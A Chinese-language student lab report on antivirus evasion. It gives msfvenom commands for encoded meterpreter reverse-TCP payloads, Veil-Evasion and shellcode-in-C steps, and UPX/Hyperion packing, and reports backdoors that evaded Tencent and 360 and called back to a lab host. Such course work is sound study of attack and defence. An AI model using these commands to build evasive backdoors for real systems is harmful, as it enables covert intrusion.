2018-2019-2 20165313 Exp3 免殺原理與實踐

實踐內容（3.5分）

1.1 正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧；(1.5分)
1.2 經過組合應用各類技術實現惡意代碼免殺(1分)
（若是成功實現了免殺的，簡單語言描述原理，不要截圖。與殺軟共生的結果驗證要截圖。）
1.3 用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（1分）

實踐基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

（1）基於特徵碼的檢測
（2）啓發式惡意軟件檢測
（3）基於行爲的檢測

（2）免殺是作什麼？

免殺：讓安插的後門不被AV(Anti-virus)軟件發現。通常是對惡意軟件作處理，讓它不被殺毒軟件所檢測。免殺也是滲透測試中須要使用到的技術。

（3）免殺的基本方法有哪些？

（1）改變特徵碼：對惡意代碼進行加殼、用其餘語言或編譯器進行再編譯，利用shellcode進行編碼
（2 改變攻擊行爲：基於內存操做、減小對系統的修改、加入混淆做用的正常功能代碼。

實踐內容（註明：試驗截圖中文件名的變化是由於測試網頁不能出現2016字眼，因此測試網頁文件名和使用文件名會存在出入。
）
========================

正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧：

（1）MSF生成.jar，.php文件測試

（2）測試上一次試驗用MSF生成的後門

很顯然效果不怎麼樣，
（這裏在測試後門的時候我換了下名字，否則網站會報錯）

（3）編譯十次試試

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.78.128 LPORT=5313 -f exe > zch5313-1.exe

看起來並無什麼明顯的改觀。

（4）安裝並使用Veil-Evasion

（1）安裝：輸入sudo apt-get install veil，而後一路贊成，耐心等待就好了。
（2）使用：
輸入veil，如圖所示：

輸入use evasion：

輸入命令：use python/meterpreter/rev_tcp.py

設置反彈鏈接IP：set LHOST 192.168.78.128+設置端口：set LPORT 5313+輸入generate生成文件+輸入名字：playload5312

沒法生成：

查了一下，發現是由於python這種語言在虛擬機裏沒法使用，故換了一種語言從新生成，即將命令use python/meterpreter/rev_tcp.py換成了use c/meterpreter/rev_tcp.py其他步驟相同（這裏就不從新演示了）測試：

C語言調用Shellcode

（1）使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=92.168.78.128 LPORT=5313 -f c 生成一個c語言格式的shellcode數組，並將其賦值給一個20165313.c文件：

（2）使用命令：i686-w64-mingw32-g++ 20165313.c -o 20165313.exe編譯這個.c文件爲可執行文件：

（3）測試（以前提到過，測試要更名，否則會報錯）：

看起來和evil效果差很少。

經過組合應用各類技術實現惡意代碼免殺

加殼並測試：
很顯然發現不了（果真不靠譜）
運行試試：

沒有反應。

用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

（1）利用MSF生成shellcode,編程並運行，生成可執行文件5313.exe
（2）利用UPX加殼。
（3）進入/usr/share/windows-binaries/hyperion/中利用加密殼Hyperion加密。

主機殺軟：騰訊電腦管家13.019837.233

另外一臺主機

殺軟：騰訊電腦管家13

實踐總結與體會

離實戰還缺些什麼技術或步驟？

我以爲實戰中最缺少的步驟就是如何把後門程序植入到目標主機中，目前試驗植入方法都是可知的，如何不可知的植入就成爲了重點，例如利用郵件植入，掛馬網頁植入等。

試驗收穫

學習瞭如何使用veil,瞭解瞭如何利用免殺技術躲過殺軟的檢測併成功欺騙了360（果真不靠譜），同時也瞭解到了後門程序的可怕，矛和盾的較量仍是得繼續下去。

實踐補充說明

實踐結束後，我又從新利用後門程序測試了360殺毒是否安全，意外發現第一次能避過檢查的程序被發現了，因而，我又在主機中生成了一個後門程序（利用MSF生成的數組和codeblocks軟件），並將其放到kali中加殼，再次測試，能夠回連，但運行一段時間後卻會被查出，在網上找了找，並無找到緣由（猜測是360在監測主機程序時有延遲或者是運行後門程序一段時間纔會使其被360偵測到）。因此這方面仍是得增強學習。（雖然沒有徹底成功，但我以爲能夠理解，畢竟360是一家專業的公司，而咱們僅僅憑着幾天的學習就能攻破其的防護，也並不現實，能讓其延遲發現，我以爲已經有所成就了。）